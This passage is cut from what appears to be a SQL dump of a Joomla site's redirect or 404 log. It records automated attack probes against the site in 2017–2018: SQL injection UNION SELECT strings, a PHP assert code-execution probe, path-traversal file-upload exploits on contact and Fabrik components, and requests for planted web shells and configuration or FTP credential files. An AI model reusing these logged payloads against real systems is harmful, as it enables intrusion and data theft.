00:00:00',301),(12179,'http://ekvatorprint.com.ua/tabkubok.php?id=2251&fdata=1+AND+1=2+UNION+SELECT+1,2,3,4,injecthere,injecthere,injecthere,injecthere,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--',NULL,'','',1,0,'2017-12-04 10:56:25','0000-00-00 00:00:00',301),(12180,'http://ekvatorprint.com.ua/verComentarios.php?Id=1+AND+1=2+UNION+SELECT+injecthere,injecthere,injecthere,4,5--',NULL,'','',1,0,'2017-12-04 10:56:30','0000-00-00 00:00:00',301),(12181,'http://ekvatorprint.com.ua/read.php?no=1+AND+1=2+UNION+SELECT+injecthere,2,3,4,5,injecthere,injecthere,injecthere--',NULL,'','',1,0,'2017-12-04 10:56:30','0000-00-00 00:00:00',301),(12182,'http://ekvatorprint.com.ua/print.php?s=6.0&ID=2&n=1+AND+1=2+UNION+SELECT+1,2,3,injecthere,injecthere,injecthere,7,8,injecthere,injecthere,injecthere,12--',NULL,'','',1,0,'2017-12-04 10:56:30','0000-00-00 00:00:00',301),(12183,'http://ekvatorprint.com.ua/fiche.php?id=818&langue=1+AND+1=2+UNION+SELECT+1--',NULL,'','',1,0,'2017-12-04 10:56:32','0000-00-00 00:00:00',301),(12184,'http://ekvatorprint.com.ua/featured1allpics.php?ID=60073316&PHOTOID=1+AND+1=2+UNION+SELECT+1,injecthere,3,4,injecthere--',NULL,'','',1,0,'2017-12-04 10:56:35','0000-00-00 00:00:00',301),(12185,'http://ekvatorprint.com.ua/matchs_handball_marnay.php?ID=1+AND+1=2+UNION+SELECT+injecthere,injecthere,injecthere,injecthere,injecthere--',NULL,'','',1,0,'2017-12-04 10:56:35','0000-00-00 00:00:00',301),(12186,'http://ekvatorprint.com.ua/list-tax-items.php?action=ti&id=1+AND+1=2+UNION+SELECT+injecthere,injecthere,3,injecthere--',NULL,'','',1,0,'2017-12-04 10:56:35','0000-00-00 00:00:00',301),(12187,'http://ekvatorprint.com.ua/noticias.php?Id=6172&seccion=1+AND+1=2+UNION+SELECT+1,injecthere--',NULL,'','',1,0,'2017-12-04 10:56:37','0000-00-00 00:00:00',301),(12188,'http://ekvatorprint.com.ua/store.php?ID=1+AND+1=2+UNION+SELECT+1,2,3,injecthere--',NULL,'','',1,0,'2017-12-04 10:56:38','0000-00-00 00:00:00',301),(12189,'http://ekvatorprint.com.ua/products-collection-dinos-detail.php?ID=1+AND+1=2+UNION+SELECT+1--',NULL,'','',1,0,'2017-12-04 10:56:38','0000-00-00 00:00:00',301),(12190,'http://ekvatorprint.com.ua/wp-content/themes/rockstar-theme/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/rockstar-theme/style.css','',2,0,'2017-12-06 15:56:07','0000-00-00 00:00:00',301),(12191,'http://ekvatorprint.com.ua/en/Default/master.css',NULL,'http://ekvatorprint.com.ua/banner-printing','',1,0,'2017-12-07 14:19:36','0000-00-00 00:00:00',301),(12192,'http://ekvatorprint.com.ua/Images/wslogo_block_page.png',NULL,'http://ekvatorprint.com.ua/banner-printing','',1,0,'2017-12-07 14:19:36','0000-00-00 00:00:00',301),(12193,'http://ekvatorprint.com.ua/wp-set.php?viagrascoreone=true',NULL,'ekvatorprint.com.ua','',1,0,'2017-12-08 18:25:29','0000-00-00 00:00:00',301),(12194,'http://ekvatorprint.com.ua/administrator/configuration.php',NULL,'','',1,0,'2017-12-11 15:35:36','0000-00-00 00:00:00',301),(12195,'http://ekvatorprint.com.ua/configuration.html',NULL,'','',1,0,'2017-12-11 15:40:46','0000-00-00 00:00:00',301),(12196,'http://ekvatorprint.com.ua/media/media.php?1=assert&2=print(md5(12345));',NULL,'ekvatorprint.com.ua','',1,0,'2017-12-12 08:32:28','0000-00-00 00:00:00',301),(12197,'http://ekvatorprint.com.ua/index.php?option=com_foxcontact&view=loader&owner=module&id=122&type=uploader&qqfile=/../ly.php',NULL,'','',1,0,'2017-12-12 20:42:49','0000-00-00 00:00:00',301),(12198,'http://ekvatorprint.com.ua/components/com_foxcontact/helpers/qqfileuploader.php?cid=1&mid=1&qqfile=/../ly.php',NULL,'','',1,0,'2017-12-12 20:42:49','0000-00-00 00:00:00',301),(12199,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&owner=component&bid=1&id=215&root=components&type=uploader&qqfile=/../ly.php',NULL,'','',1,0,'2017-12-12 20:42:50','0000-00-00 00:00:00',301),(12200,'http://ekvatorprint.com.ua/component/b2jcontact/loader/module/149/components/b2jcontact/uploader.html?bid=2&qqfile=/../ly.php',NULL,'','',1,0,'2017-12-12 20:42:51','0000-00-00 00:00:00',301),(12201,'http://ekvatorprint.com.ua/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload',NULL,'','',57,0,'2017-12-13 20:13:35','0000-00-00 00:00:00',301),(12202,'http://ekvatorprint.com.ua/cli/system_infos.php',NULL,'http://site.ru','',3,0,'2017-12-14 15:57:01','0000-00-00 00:00:00',301),(12203,'http://ekvatorprint.com.ua/lfm.php',NULL,'http://site.ru','',6,0,'2017-12-14 16:11:42','0000-00-00 00:00:00',301),(12204,'http://ekvatorprint.com.ua/libraries/joomla/client/lauth.php',NULL,'http://site.ru','',4,0,'2017-12-14 21:02:28','0000-00-00 00:00:00',301),(12205,'http://ekvatorprint.com.ua/maints/popup-pomo.php',NULL,'http://site.ru','',5,0,'2017-12-14 22:20:21','0000-00-00 00:00:00',301),(12206,'http://ekvatorprint.com.ua/theme/assets/global/plugins/jquery-file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/theme/assets/global/plugins/jquery-file-upload/server/php/','',4,0,'2017-12-14 23:42:52','0000-00-00 00:00:00',301),(12207,'http://ekvatorprint.com.ua/templates/header_img.php.suspected',NULL,'http://site.ru','',3,0,'2017-12-15 02:10:49','0000-00-00 00:00:00',301),(12208,'http://ekvatorprint.com.ua/widgetsa/popup-pomo.php',NULL,'http://site.ru','',3,0,'2017-12-15 04:20:03','0000-00-00 00:00:00',301),(12209,'http://ekvatorprint.com.ua/modules/mod_k2_0615/tmpl/Default/bookmark.php',NULL,'http://site.ru','',3,0,'2017-12-15 04:52:05','0000-00-00 00:00:00',301),(12210,'http://ekvatorprint.com.ua/xmlrpz.php',NULL,'http://site.ru','',6,0,'2017-12-15 04:58:41','0000-00-00 00:00:00',301),(12211,'http://ekvatorprint.com.ua/conflg.php',NULL,'http://site.ru','',3,0,'2017-12-15 05:23:11','0000-00-00 00:00:00',301),(12212,'http://ekvatorprint.com.ua/revisiona/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-12-15 06:15:06','0000-00-00 00:00:00',301),(12213,'http://ekvatorprint.com.ua/libraries/phpmailer/language/mark.php',NULL,'http://site.ru','',2,0,'2017-12-15 07:05:43','0000-00-00 00:00:00',301),(12214,'http://ekvatorprint.com.ua/logs/system_infos.php',NULL,'http://site.ru','',3,0,'2017-12-15 07:41:26','0000-00-00 00:00:00',301),(12215,'http://ekvatorprint.com.ua/libraries/joomla/template/bookmark.php',NULL,'http://site.ru','',5,0,'2017-12-15 09:10:16','0000-00-00 00:00:00',301),(12216,'http://ekvatorprint.com.ua/modules/mod_footer/tmpl/mark.php',NULL,'http://site.ru','',3,0,'2017-12-15 10:41:37','0000-00-00 00:00:00',301),(12217,'http://ekvatorprint.com.ua/xmlrpc/header_img.php.suspected',NULL,'http://site.ru','',7,0,'2017-12-15 10:49:31','0000-00-00 00:00:00',301),(12218,'http://ekvatorprint.com.ua/images/pimeri_shablonov/D0BCD188-3-5.png',NULL,'','',1,0,'2017-12-15 12:30:50','0000-00-00 00:00:00',301),(12219,'http://ekvatorprint.com.ua/modules/mod_customer/mod_customer.php?mod=in',NULL,'ekvatorprint.com.ua','',1,0,'2017-12-15 14:02:55','0000-00-00 00:00:00',301),(12220,'http://ekvatorprint.com.ua/f.php',NULL,'http://site.ru','',3,0,'2017-12-15 14:21:26','0000-00-00 00:00:00',301),(12221,'http://ekvatorprint.com.ua/conf.ini.php',NULL,'http://site.ru','',1,0,'2017-12-15 15:05:01','0000-00-00 00:00:00',301),(12222,'http://ekvatorprint.com.ua/postnewa/popup-pomo.php',NULL,'http://site.ru','',5,0,'2017-12-15 15:53:21','0000-00-00 00:00:00',301),(12223,'http://ekvatorprint.com.ua/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=1\'',NULL,'','',1,0,'2017-12-15 20:13:02','0000-00-00 00:00:00',301),(12224,'http://ekvatorprint.com.ua/index.php?option=com_osdownloads&view=downloads&id=1\'',NULL,'','',1,0,'2017-12-15 20:13:02','0000-00-00 00:00:00',301),(12225,'http://ekvatorprint.com.ua/index.php?option=com_pofos&view=pofo&id=1\'',NULL,'','',1,0,'2017-12-15 20:13:02','0000-00-00 00:00:00',301),(12226,'http://ekvatorprint.com.ua/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=1\'',NULL,'','',1,0,'2017-12-15 20:13:02','0000-00-00 00:00:00',301),(12227,'http://ekvatorprint.com.ua/index.php?option=com_surveyforce&task=start_invited&survey=1&invite=1\'',NULL,'','',1,0,'2017-12-15 20:13:02','0000-00-00 00:00:00',301),(12228,'http://ekvatorprint.com.ua/index.php?option=com_ajaxquiz&view=ajaxquiz&cid=1\'',NULL,'','',1,0,'2017-12-15 20:13:02','0000-00-00 00:00:00',301),(12229,'http://ekvatorprint.com.ua/index.php?option=com_focalpoint&view=location&id=1\'',NULL,'','',1,0,'2017-12-15 20:13:02','0000-00-00 00:00:00',301),(12230,'http://ekvatorprint.com.ua/index.php?option=com_sponsorwall&task=click&wallid=1\'',NULL,'','',1,0,'2017-12-15 20:13:02','0000-00-00 00:00:00',301),(12231,'http://ekvatorprint.com.ua/index.php?option=com_flipwall&task=click&wallid=1\'',NULL,'','',1,0,'2017-12-15 20:13:02','0000-00-00 00:00:00',301),(12232,'http://ekvatorprint.com.ua/index.php?option=com_spmoviedb&view=searchresults&type=movies&Itemid=1&searchword=1\'',NULL,'','',1,0,'2017-12-15 20:13:03','0000-00-00 00:00:00',301),(12233,'http://ekvatorprint.com.ua/index.php?option=com_zcalendar&view=plugin&name=rsvp&task=rsvpform&user=&eid=1\'',NULL,'','',1,0,'2017-12-15 20:13:03','0000-00-00 00:00:00',301),(12234,'http://ekvatorprint.com.ua/index.php?option=com_twitchtv&view=twitch&username=1\'',NULL,'','',1,0,'2017-12-15 20:13:03','0000-00-00 00:00:00',301),(12235,'http://ekvatorprint.com.ua/index.php?option=com_streetguess&view=maps&catid=1\'',NULL,'','',1,0,'2017-12-15 20:13:03','0000-00-00 00:00:00',301),(12236,'http://ekvatorprint.com.ua/index.php?option=com_upl&view=propertylisting&sf_selectuser_id=1\'',NULL,'','',1,0,'2017-12-15 20:13:03','0000-00-00 00:00:00',301),(12237,'http://ekvatorprint.com.ua/index.php?option=com_registrationpro&view=category&id=1\'',NULL,'','',1,0,'2017-12-15 20:13:03','0000-00-00 00:00:00',301),(12238,'http://ekvatorprint.com.ua/index.php?option=com_lmsking&view=lmsking&layout=learningpath&task=learningPath&cp_id=1\'',NULL,'','',1,0,'2017-12-15 20:13:03','0000-00-00 00:00:00',301),(12239,'http://ekvatorprint.com.ua/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=1\'',NULL,'','',1,0,'2017-12-15 20:13:03','0000-00-00 00:00:00',301),(12240,'http://ekvatorprint.com.ua/index.php?option=com_simgenealogy&view=latest&type=1\'',NULL,'','',1,0,'2017-12-15 20:13:03','0000-00-00 00:00:00',301),(12241,'http://ekvatorprint.com.ua/index.php?option=com_ccnewsletter&view=detail&id=1&tmpl=newsletter&sbid=1\'',NULL,'','',1,0,'2017-12-15 20:13:03','0000-00-00 00:00:00',301),(12242,'http://ekvatorprint.com.ua/index.php?option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=1&placemarklistid=1\'',NULL,'','',1,0,'2017-12-15 20:13:04','0000-00-00 00:00:00',301),(12243,'http://ekvatorprint.com.ua/layouts/joomla/tinymce/buttons/agzlngx.php',NULL,'http://site.ru','',1,0,'2017-12-15 22:53:15','0000-00-00 00:00:00',301),(12244,'http://ekvatorprint.com.ua/roots.php',NULL,'http://site.ru','',4,0,'2017-12-16 01:18:43','0000-00-00 00:00:00',301),(12245,'http://ekvatorprint.com.ua/wp-includes/upgrade/theme-compat/popup-pomo.php',NULL,'http://site.ru','',1,0,'2017-12-16 01:38:16','0000-00-00 00:00:00',301),(12246,'http://ekvatorprint.com.ua/price/blogs/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:30:21','0000-00-00 00:00:00',301),(12247,'http://ekvatorprint.com.ua/price/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:30:21','0000-00-00 00:00:00',301),(12248,'http://ekvatorprint.com.ua/price/blog/wordpress/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:30:21','0000-00-00 00:00:00',301),(12249,'http://ekvatorprint.com.ua/price/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:30:22','0000-00-00 00:00:00',301),(12250,'http://ekvatorprint.com.ua/price/site/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:30:22','0000-00-00 00:00:00',301),(12251,'http://ekvatorprint.com.ua/price/cms/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:30:22','0000-00-00 00:00:00',301),(12252,'http://ekvatorprint.com.ua/wp-models.php',NULL,'http://site.ru','',2,0,'2017-12-16 04:33:30','0000-00-00 00:00:00',301),(12253,'http://ekvatorprint.com.ua/Good.php',NULL,'http://site.ru','',6,0,'2017-12-16 05:14:00','0000-00-00 00:00:00',301),(12254,'http://ekvatorprint.com.ua/profilea/popup-pomo.php',NULL,'http://site.ru','',1,0,'2017-12-16 06:13:37','0000-00-00 00:00:00',301),(12255,'http://ekvatorprint.com.ua/jdownloads/logo_img.php.suspected',NULL,'http://site.ru','',4,0,'2017-12-16 08:23:49','0000-00-00 00:00:00',301),(12256,'http://ekvatorprint.com.ua/templates/ananda/gnb.php',NULL,'http://site.ru','',5,0,'2017-12-16 10:22:00','0000-00-00 00:00:00',301),(12257,'http://ekvatorprint.com.ua/templates/beez3/gnb.php',NULL,'http://site.ru','',3,0,'2017-12-16 11:18:36','0000-00-00 00:00:00',301),(12258,'http://ekvatorprint.com.ua/dark.php',NULL,'http://site.ru','',2,0,'2017-12-16 11:51:56','0000-00-00 00:00:00',301),(12259,'http://ekvatorprint.com.ua/logs/ybbbcc.php',NULL,'http://site.ru','',3,0,'2017-12-16 12:17:42','0000-00-00 00:00:00',301),(12260,'http://ekvatorprint.com.ua/updatecore/popup-pomo.php',NULL,'http://site.ru','',1,0,'2017-12-16 13:18:23','0000-00-00 00:00:00',301),(12261,'http://ekvatorprint.com.ua/gcheckout/popup-pomo.php',NULL,'http://site.ru','',5,0,'2017-12-16 13:43:34','0000-00-00 00:00:00',301),(12262,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php',NULL,'http://site.ru','',4,0,'2017-12-16 14:48:54','0000-00-00 00:00:00',301),(12263,'http://ekvatorprint.com.ua/administrator/head_img.php.suspected',NULL,'http://site.ru','',2,0,'2017-12-16 15:49:22','0000-00-00 00:00:00',301),(12264,'http://ekvatorprint.com.ua/wp-content/themes/radial-theme/functions/upload-handler.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/radial-theme/functions/upload-handler.php','',1,0,'2017-12-16 17:30:09','0000-00-00 00:00:00',301),(12265,'http://ekvatorprint.com.ua/wp-content/themes/bordeaux-theme/functions/upload-handler.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/bordeaux-theme/functions/upload-handler.php','',2,0,'2017-12-16 17:44:31','0000-00-00 00:00:00',301),(12266,'http://ekvatorprint.com.ua/libraries/joomla/template/popup-pomo.php',NULL,'http://site.ru','',4,0,'2017-12-16 19:57:44','0000-00-00 00:00:00',301),(12267,'http://ekvatorprint.com.ua/administrator/header_img.php',NULL,'http://site.ru','',5,0,'2017-12-16 22:03:24','0000-00-00 00:00:00',301),(12268,'http://ekvatorprint.com.ua/phpmaila/popup-pomo.php',NULL,'http://site.ru','',6,0,'2017-12-16 22:22:23','0000-00-00 00:00:00',301),(12269,'http://ekvatorprint.com.ua/administrator/includes/use.php',NULL,'http://site.ru','',4,0,'2017-12-16 22:57:01','0000-00-00 00:00:00',301),(12270,'http://ekvatorprint.com.ua/robotobum.ru/tmp/system_infos.php',NULL,'http://site.ru','',2,0,'2017-12-17 13:27:04','0000-00-00 00:00:00',301),(12271,'http://ekvatorprint.com.ua/wp-updats.php.suspected',NULL,'http://site.ru','',1,0,'2017-12-17 14:46:05','0000-00-00 00:00:00',301),(12272,'http://ekvatorprint.com.ua/plugins/xsxaoc.php.suspected',NULL,'http://site.ru','',4,0,'2017-12-17 15:46:47','0000-00-00 00:00:00',301),(12273,'http://ekvatorprint.com.ua/media/k.php',NULL,'http://site.ru','',1,0,'2017-12-17 15:51:41','0000-00-00 00:00:00',301),(12274,'http://ekvatorprint.com.ua/sim1.php',NULL,'http://site.ru','',3,0,'2017-12-17 17:19:46','0000-00-00 00:00:00',301),(12275,'http://ekvatorprint.com.ua/modules/mod_svit_manufacturers/sucjde.php.suspected',NULL,'http://site.ru','',1,0,'2017-12-17 17:19:56','0000-00-00 00:00:00',301),(12276,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_checkin/vtmfyij.php.suspected',NULL,'http://site.ru','',1,0,'2017-12-17 17:20:34','0000-00-00 00:00:00',301),(12277,'http://ekvatorprint.com.ua/media/mod.php',NULL,'http://site.ru','',4,0,'2017-12-17 17:21:54','0000-00-00 00:00:00',301),(12278,'http://ekvatorprint.com.ua/headers_img.php.suspected',NULL,'http://site.ru','',4,0,'2017-12-17 17:51:54','0000-00-00 00:00:00',301),(12279,'http://ekvatorprint.com.ua/modules/header_img.php.suspected',NULL,'http://site.ru','',1,0,'2017-12-17 18:39:16','0000-00-00 00:00:00',301),(12280,'http://ekvatorprint.com.ua/administrator/help/vsqhc.php.suspected',NULL,'http://site.ru','',1,0,'2017-12-17 19:55:06','0000-00-00 00:00:00',301),(12281,'http://ekvatorprint.com.ua/components/com_user/views/reset/mod.php',NULL,'http://site.ru','',4,0,'2017-12-17 20:23:06','0000-00-00 00:00:00',301),(12282,'http://ekvatorprint.com.ua/media/headers_img.php.suspected',NULL,'http://site.ru','',4,0,'2017-12-17 20:25:44','0000-00-00 00:00:00',301),(12283,'http://ekvatorprint.com.ua/components/com_banners/models/mod.php',NULL,'http://site.ru','',2,0,'2017-12-17 20:30:49','0000-00-00 00:00:00',301),(12284,'http://ekvatorprint.com.ua/components/com_contact/contact.lib.php',NULL,'http://site.ru','',2,0,'2017-12-17 20:34:05','0000-00-00 00:00:00',301),(12285,'http://ekvatorprint.com.ua/modules/mod_yoo_gallery/yoo_gallery/bgsse.php.suspected',NULL,'http://site.ru','',2,0,'2017-12-17 21:00:31','0000-00-00 00:00:00',301),(12286,'http://ekvatorprint.com.ua/modules/mod_yoo_gallery/yoo_gallery/bgsse.php.suspected',NULL,'http://site.ru','',1,0,'2017-12-17 21:00:31','0000-00-00 00:00:00',301),(12287,'http://ekvatorprint.com.ua/administrator/components/com_redirect/ztolfh.php.suspected',NULL,'http://site.ru','',2,0,'2017-12-17 22:56:35','0000-00-00 00:00:00',301),(12288,'http://ekvatorprint.com.ua/components/com_media/helpers/mark.php',NULL,'http://site.ru','',1,0,'2017-12-17 23:21:19','0000-00-00 00:00:00',301),(12289,'http://ekvatorprint.com.ua/modules/mod_login/mod_log.php',NULL,'http://site.ru','',4,0,'2017-12-18 00:08:44','0000-00-00 00:00:00',301),(12290,'http://ekvatorprint.com.ua/.ftpconfig',NULL,'','',13,0,'2017-12-18 00:21:26','0000-00-00 00:00:00',301),(12291,'http://ekvatorprint.com.ua/components/com_b2jcontact/',NULL,'','',15,0,'2017-12-18 04:07:08','0000-00-00 00:00:00',301),(12292,'http://ekvatorprint.com.ua/images/pimeri_shablonov/',NULL,'','',1,0,'2017-12-19 12:19:40','0000-00-00 00:00:00',301),(12293,'http://ekvatorprint.com.ua/wp-content/plugins/font-uploader/font-upload.php',NULL,'','',2,0,'2017-12-22 02:32:16','0000-00-00 00:00:00',301),(12294,'http://ekvatorprint.com.ua/images/pimeri_shablonov/u043cu0448-3-3.png',NULL,'','',1,0,'2017-12-22 03:12:58','0000-00-00 00:00:00',301),(12295,'http://ekvatorprint.com.ua/krd.txt',NULL,'','',1,0,'2017-12-22 23:31:42','0000-00-00 00:00:00',301),(12296,'http://ekvatorprint.com.ua/\r/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2017-12-23 09:43:57','0000-00-00 00:00:00',301),(12297,'http://ekvatorprint.com.ua/banner-printing@10',NULL,'http://ekvatorprint.com.ua/banner-printing%4010','',6,0,'2017-12-24 23:48:38','0000-00-00 00:00:00',301),(12298,'http://ekvatorprint.com.ua/assets/global/plugins/jquery-file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/assets/global/plugins/jquery-file-upload/server/php/','',3,0,'2017-12-26 02:45:59','0000-00-00 00:00:00',301),(12299,'http://ekvatorprint.com.ua/wp-content/themes/rayoflight/functions/upload-handler.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/rayoflight/functions/upload-handler.php','',1,0,'2017-12-26 21:52:33','0000-00-00 00:00:00',301),(12300,'http://ekvatorprint.com.ua/customer/account/create/',NULL,'','',1,0,'2017-12-27 11:42:15','0000-00-00 00:00:00',301),(12301,'http://ekvatorprint.com.ua/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php','',4,0,'2017-12-27 23:20:07','0000-00-00 00:00:00',301),(12302,'http://ekvatorprint.com.ua/feed/',NULL,'','',4,0,'2017-12-28 14:32:22','0000-00-00 00:00:00',301),(12303,'http://ekvatorprint.com.ua/.git/info/refs?service=git-upload-pack',NULL,'','',3,0,'2017-12-29 01:42:57','0000-00-00 00:00:00',301),(12304,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact',NULL,'','',16,0,'2017-12-30 02:14:27','0000-00-00 00:00:00',301),(12305,'http://ekvatorprint.com.ua/images/pimeri_shablonov/u043cu0448-3-1.png',NULL,'','',1,0,'2017-12-30 06:08:26','0000-00-00 00:00:00',301),(12306,'http://ekvatorprint.com.ua/wp-content/plugins/wpstorecart/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wpstorecart/readme.txt','',7,0,'2017-12-30 21:07:06','0000-00-00 00:00:00',301),(12307,'http://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&view=xml/index.php?option=com_b2jcontact',NULL,'','',1,0,'2017-12-31 03:20:39','0000-00-00 00:00:00',301),(12308,'http://ekvatorprint.com.ua/index.php?option=com_simplecalendar',NULL,'http://www.google.com/','',1,0,'2017-12-31 07:44:21','0000-00-00 00:00:00',301),(12309,'http://ekvatorprint.com.ua/ \'A=0',NULL,'http://ekvatorprint.com.ua/ \'A=0','',1,0,'2017-12-31 12:56:13','0000-00-00 00:00:00',301),(12310,'http://ekvatorprint.com.ua/ekvatorprint.com.ua',NULL,'','',4,0,'2017-12-31 16:21:00','0000-00-00 00:00:00',301),(12311,'http://ekvatorprint.com.ua/components/com_jbcatalog/',NULL,'','',1,0,'2017-12-31 22:28:48','0000-00-00 00:00:00',301),(12312,'http://ekvatorprint.com.ua/modules/wdoptionpanel/wdoptionpanel_ajax.php',NULL,'','',2,0,'2018-01-01 04:36:54','0000-00-00 00:00:00',301),(12313,'http://ekvatorprint.com.ua/modules/pk_flexmenu/ajax/upload.php',NULL,'','',2,0,'2018-01-01 04:37:10','0000-00-00 00:00:00',301),(12314,'http://ekvatorprint.com.ua/components/com_foxcontact/_func.php',NULL,'','',10,0,'2018-01-02 07:23:04','0000-00-00 00:00:00',301),(12315,'http://ekvatorprint.com.ua/_install/template/css/kkooycj.php',NULL,'http://site.ru','',2,0,'2018-01-02 12:15:40','0000-00-00 00:00:00',301),(12316,'http://ekvatorprint.com.ua/discussiona/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-01-02 13:03:34','0000-00-00 00:00:00',301),(12317,'http://ekvatorprint.com.ua/product/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-01-02 14:24:59','0000-00-00 00:00:00',301),(12318,'http://ekvatorprint.com.ua/themes/README.txt',NULL,'','',4,0,'2018-01-03 03:49:41','0000-00-00 00:00:00',301),(12319,'http://ekvatorprint.com.ua/models.php',NULL,'http://site.ru','',2,0,'2018-01-03 16:39:17','0000-00-00 00:00:00',301),(12320,'http://ekvatorprint.com.ua/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php','',1,0,'2018-01-03 21:34:04','0000-00-00 00:00:00',301),(12321,'http://ekvatorprint.com.ua/click/?http://ya.ru=',NULL,'','',1,0,'2018-01-04 00:14:14','0000-00-00 00:00:00',301),(12322,'http://ekvatorprint.com.ua/goto.php?http://ya.ru=',NULL,'','',1,0,'2018-01-04 00:14:15','0000-00-00 00:00:00',301),(12323,'http://ekvatorprint.com.ua/templates/header_img.php',NULL,'http://site.ru','',2,0,'2018-01-04 07:13:24','0000-00-00 00:00:00',301),(12324,'http://ekvatorprint.com.ua/templates/ja_drimia_bk/index.php.suspected',NULL,'http://site.ru','',1,0,'2018-01-04 07:40:43','0000-00-00 00:00:00',301),(12325,'http://ekvatorprint.com.ua/templates/ja_drimia_bk/index.php',NULL,'http://site.ru','',1,0,'2018-01-04 08:30:11','0000-00-00 00:00:00',301),(12326,'http://ekvatorprint.com.ua/images/create-cms-user.php',NULL,'http://site.ru','',3,0,'2018-01-04 10:16:32','0000-00-00 00:00:00',301),(12327,'http://ekvatorprint.com.ua/contac',NULL,'','',1,0,'2018-01-04 12:29:28','0000-00-00 00:00:00',301),(12328,'http://ekvatorprint.com.ua/0day.php',NULL,'http://ekvatorprint.com.ua/0day.php','',1,0,'2018-01-05 02:57:36','0000-00-00 00:00:00',301),(12329,'http://ekvatorprint.com.ua/administrator/components/com_redirect/controllers/backup.php',NULL,'http://site.ru','',2,0,'2018-01-05 06:56:20','0000-00-00 00:00:00',301),(12330,'http://ekvatorprint.com.ua/administrator/components/com_redirect/controllers/backup.php',NULL,'http://site.ru','',1,0,'2018-01-05 06:56:20','0000-00-00 00:00:00',301),(12331,'http://ekvatorprint.com.ua/login/ajax-login/',NULL,'','',1,0,'2018-01-05 12:07:05','0000-00-00 00:00:00',301),(12332,'http://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0',NULL,'http://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0','',1,0,'2018-01-06 09:58:47','0000-00-00 00:00:00',301),(12333,'http://ekvatorprint.com.ua/administrator/components/com_k2/views/user/tmpl/htaccess.php',NULL,'http://site.ru','',4,0,'2018-01-06 11:13:39','0000-00-00 00:00:00',301),(12334,'http://ekvatorprint.com.ua/ok.php',NULL,'http://site.ru','',1,0,'2018-01-06 12:13:16','0000-00-00 00:00:00',301),(12335,'http://ekvatorprint.com.ua/CWyIog.php',NULL,'http://site.ru','',1,0,'2018-01-06 12:55:22','0000-00-00 00:00:00',301),(12336,'http://ekvatorprint.com.ua/plugins/system/plg_system_anticopy/index.php',NULL,'http://site.ru','',2,0,'2018-01-06 12:56:13','0000-00-00 00:00:00',301),(12337,'http://ekvatorprint.com.ua/cache/content-post.php',NULL,'http://site.ru','',1,0,'2018-01-06 12:57:37','0000-00-00 00:00:00',301),(12338,'http://ekvatorprint.com.ua/media/loader.php',NULL,'http://site.ru','',1,0,'2018-01-06 13:01:29','0000-00-00 00:00:00',301),(12339,'http://ekvatorprint.com.ua/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage&id_slide=php',NULL,'','',3,0,'2018-01-06 13:37:20','0000-00-00 00:00:00',301),(12340,'http://ekvatorprint.com.ua/wp-content/plugins/dzs-videogallery/admin/upload.php',NULL,'','',2,0,'2018-01-06 13:38:30','0000-00-00 00:00:00',301),(12341,'http://ekvatorprint.com.ua/wp-content/plugins/uploader/uploadify/uploadify.php',NULL,'','',1,0,'2018-01-06 13:39:32','0000-00-00 00:00:00',301),(12342,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/pagebreak/thumbs.php',NULL,'http://site.ru','',1,0,'2018-01-06 14:15:22','0000-00-00 00:00:00',301),(12343,'http://ekvatorprint.com.ua/components/com_kunena/controller/announcement/edit/edit.php',NULL,'http://site.ru','',1,0,'2018-01-06 15:11:29','0000-00-00 00:00:00',301),(12344,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/gino/k.php',NULL,'http://site.ru','',1,0,'2018-01-06 15:12:25','0000-00-00 00:00:00',301),(12345,'http://ekvatorprint.com.ua/components/com_plugins/models/item.php',NULL,'http://site.ru','',1,0,'2018-01-06 16:43:30','0000-00-00 00:00:00',301),(12346,'http://ekvatorprint.com.ua/images/set.php.',NULL,'http://site.ru','',2,0,'2018-01-06 17:46:01','0000-00-00 00:00:00',301),(12347,'http://ekvatorprint.com.ua/components/com_content/views/category/tmpl/config.php',NULL,'http://site.ru','',1,0,'2018-01-06 18:51:14','0000-00-00 